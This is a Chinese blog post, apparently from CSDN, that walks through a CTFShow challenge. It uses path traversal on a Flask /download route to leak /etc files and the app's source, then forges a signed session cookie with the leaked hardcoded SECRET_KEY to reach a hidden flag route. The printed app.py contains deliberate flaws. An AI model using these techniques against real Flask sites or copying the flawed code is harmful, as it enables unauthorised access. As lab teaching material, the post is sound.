[CTFShow] 记一次Flask session伪造

已于 2022-11-13 20:03:16 修改
阅读量1.7k 收藏 6
点赞数 1
分类专栏: CTF Python 文章标签: flask python 后端 web安全
于 2022-11-13 20:02:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YV_LING/article/details/127823918
版权

[CTFShow] 记一次Flask session伪造

双十一的时候,ctfshow搞了一个“菜狗杯”比赛,其中有道题印象比较深刻,在此记录一下。

打开靶机,“抽老婆”可还行。

image-20221112174528318

image-20221112174544719

按照惯例,打开开发者工具查看网页源码

image-20221112174719548

发现这个下载按钮请求了一个/download路由,并且url中的payload可控,第一反应就是存在目录穿越漏洞。

尝试构造payload读取敏感文件,试了一些,发现能读取/etc下的敏感文件,证实了目录穿越的存在。

在尝试直接读取flag文件时,页面提示:

image-20221112183441901

尝试读取其它文件,页面报错:

image-20221112183630046

查看有关代码发现,网站使用flask构建,并且过滤了url中的flag字符串:

image-20221112183756352

注意到这里的主程序是/app/app.py,由于存在目录穿越,于是尝试直接读取app.py:

image-20221112183950839

成功拿到源文件:

# !/usr/bin/env python
# -*-coding:utf-8 -*-

"""
# File       : app.py
# Time       :2022/11/07 09:16
# Author     :g4_simon
# version    :python 3.9.7
# Description:抽老婆,哇偶~
"""

from flask import *
import os
import random
from flag import flag

#初始化全局变量
app = Flask(__name__)
app.config['SECRET_KEY'] = 'tanji_is_A_boy_Yooooooooooooooooooooo!'

@app.route('/', methods=['GET'])
def index():  
    return render_template('index.html')


@app.route('/getwifi', methods=['GET'])
def getwifi():
    session['isadmin']=False
    wifi=random.choice(os.listdir('static/img'))
    session['current_wifi']=wifi
    return render_template('getwifi.html',wifi=wifi)



@app.route('/download', methods=['GET'])
def source(): 
    filename=request.args.get('file')
    if 'flag' in filename:
        return jsonify({"msg":"你想干什么?"})
    else:
        return send_file('static/img/'+filename,as_attachment=True)


@app.route('/secret_path_U_never_know',methods=['GET'])
def getflag():
    if session['isadmin']:
        return jsonify({"msg":flag})
    else:
        return jsonify({"msg":"你怎么知道这个路径的?不过还好我有身份验证"})



if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=True)

分析源代码,发现了一个隐藏的路由:/secret_path_U_never_know,这里对session进行了校验,只有当session的值为"isadmin"并且签名正确时,才能访问到flag。

于是想到flask的session伪造。

将源代码中关于session的部分进行修改:

  • 将session[‘isadmin’]的值改为True
  • 将session[‘current_wifi’]的值改为在线容器能访问到的文件路径
  • 将当前方法的返回值修改为任意字符串,防止报错
@app.route('/getwifi', methods=['GET'])
def getwifi():
    session['isadmin']=True
    session['current_wifi']="59f900ed51ee7e92e4bec6ef1b8d6f5c.jpg"
    return "test"

修改完成后在本地启动,访问/getwifi,打开开发者工具获取正确的session:

image-20221112185657196

访问线上环境的/secret_path_U_never_know路由,将获得的session替换线上环境的session,刷新:

image-20221112185855851

成功拿到flag。

YV_LING
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow-菜狗杯-flask session伪造-抽老婆
qq_31415417的博客
01-02 1378
CTFshow-菜狗杯-flask session伪造-抽老婆
[ctf web]flask session伪造 伪造admin
ShenZ的博客
08-06 1416
flask session 伪造 flasksession是在客户端的,因此可以尝试进行伪造伪造需要密钥,一般在app/config.py里面 SESSION解密脚本 #!/usr/bin/env python3 import sys import zlib from base64 import b64decode from flask.sessions import session_json_serializer from itsdangerous import base64_decode def
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 600
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Flask中的session伪造
m0_60716947的博客
10-18 1135
flasksession伪造
CTFshow 菜狗杯之 抽老婆解题思路和流程
最新发布
weixin_58052886的博客
06-13 589
CTFshow 菜狗杯之 抽老婆解题思路和流程
浅谈flaskctf那些事
蚁景网安学院
08-21 2528
最近跑了培训写了点flasksession伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。debug pin本地先起一个开启debug模式的服务:# -...
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 469
[HarekazeCTF2019]Easy Notes(session伪造)
flask中的session伪造问题
m0_62422842的博客
09-05 2585
flask中的session伪造问题,涉及两道ctf题目,一道主要考察session伪造,另一道session伪造与py反序列化结合考察。
flask session伪造
weixin_44216796的博客
12-03 2198
前言: 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 一开始看这个概念可能有些懵,看了很多大师傅们的博客后,慢慢明白这个概念的道理。 在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据
CTF】buuctf web(五)——[HCTF 2018]admin——flask session伪造+Unicode欺骗
m0_52923241的博客
08-23 1809
[HCTF 2018]admin 这里有两个选项,点击register注册一个新账户 下面这就算是登进来了 查看源码 提示you are not admin,可能需要登录admin才能获取我们想要的东西
flask session组件的使用示例
09-19
PythonWeb开发框架Flask中,Session是一个关键的组件,用于在用户的多次请求之间保持状态。本篇文章将深入探讨Flask内置的Session组件以及第三方的`flask-session`组件的使用方法和处理机制。 一、Flask 内置 ...
Flaskflask-session的具体使用
09-20
Flask框架中,session管理是一个重要的功能,它允许开发者在用户的不同请求之间保持状态。然而,Flask的默认实现仅使用签名cookie来保存session数据,这可能不满足所有需求。`flask-session`扩展提供了解决方案,...
flasksession、cookie解加密脚本
10-13
总的来说,这个压缩包提供了一个关于如何在`Flask`中处理和解密`session`和`cookie`的示例。了解`session`和`cookie`的工作原理以及如何在`Flask`中操作它们,对于开发安全Web应用至关重要。开发者可以通过研究...
一次关于python-flask蓝图的坑
01-20
一次关于python-flask蓝图的坑一.简介二.特色三.flask规模化四. flask Blueprint 一.简介 Flask是一个使用Python编写的轻量级Web应用框架。基于Werkzeug WSGI工具箱和Jinja2 模板引擎。Flask使用BSD授权。Flask...
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
Flask Session Cookie解码器/编码器 原作者: 修复和改进作者: 从导入 依赖 Python 2或Python 3 安装 包 BlackArch Linux # pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn ...
ctfshow 愚人杯&菜狗杯部分题目(flasksession伪造&ssti)
weixin_63231007的博客
04-11 1651
flask-session伪造 + 无过滤ssti命令执行 + php整数溢出
CTFweb篇-反序列化和SESSION(一)
weixin_44597701的博客
08-09 1073
前面讲到过一点SESSION,这里要继续说一点 SESSION的几种形式 这里是binary session的形成方法可以在php.ini中设置。默认是php(可能是php_serialize) 例子: php形式: php_serialize形式: php_binary: ini_set() ini_set ( string $varname , string $newvalue ) 在配置文件中设置配置的值 ini_set('session.serialize_handles','php')
flask源码阅读笔(2)-session相关
一只皮皮熊
07-17 303
一、session的使用与常识 1.参考flask官方demo实现如下一段代码 # encoding: utf-8 """ @version: 1.0 @author: pierrexiong @file: my_session @time: 2018/7/17 上午12:00 """ from f
flask session
06-07
Flask sessionFlask 框架提供的一种机制,用于在不同请求之间存储和共享数据。它使用一个加密的 cookie 来存储数据,这样即使 cookie 被窃取,也无法读取其中的数据。通过 flask.session 对象可以轻松地设置和获取 session 数据,例如用户登录信息等。 在使用 Flask session 时,需要设置一个 SECRET_KEY,用于对 session 数据进行加密。这个密钥应该是一个随机的字符串,并且应该保存在环境变量或配置文件中,而不应该明文存储在代码中。此外,Flask session 还支持将 session 数据存储在服务器端的数据库或缓存中,以实现更高级的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YV_LING

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值